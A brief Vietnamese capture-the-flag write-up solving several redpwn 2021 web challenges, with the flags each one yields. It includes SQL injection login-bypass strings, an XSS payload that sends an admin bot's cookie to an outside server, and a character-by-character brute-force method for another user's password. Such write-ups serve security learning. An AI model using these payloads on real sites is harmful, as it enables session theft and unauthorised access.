[Web]redpwn 2021
Last updated
Was this helpful?
Last updated
Was this helpful?
Ctrl+U -> Ctrl+F 'flag'
flag{inspect_me_like_123}
Bài này là sqli cơ bản, trong source app.js có statement SELECT sql dễ bị khai thác:
Username: admin' -- -
Password: gicungduoc
flag{sqli_overused_again_0b4f6}
Đây là 1 bài CSS cơ bản.
Create Paste: <script>fetch('yourserver.com?c=' + document.cookie)</script>
Submit url đến Admin bot, và kiểm tra server:
flag{d1dn7_n33d_70_b3_1n_ru57}
Đây là sqli cơ bản dễ dàng khai thác tại statement SELECT, nhưng trước khi gửi thì username và password được base64 encode nên cần dùng Proxy để sửa trước khi gửi đi.
PAYLOAD: username=gicungduoc&password='+or+1=1+--+-
flag{50m37h1n6_50m37h1n6_cl13n7_n07_600d}
Source app.py cho ta biết: account ginkoid được insert vào db mỗi lần khởi tạo, password của user này có 32 ký tự ngẫu nhiên, chức năng register chỉ cho phép tạo tên chứa chữ và số.
Với chức năng register thì có một chỗ có thể khai thác là không check password.
Ý tưởng: Mình sẽ tạo 1 account với username random và password là 1 ký tự của password user ginkoid. Không biết password đó là gì, mình đăng nhập để bruteforce 1 ký tự password đó bằng username vừa đăng ký. Nếu login thành công thì CHÍNH NÓ =))) làm lại như vậy 32 lần!
flag{44r0n_s4ys_s08r137y_1s_c00l}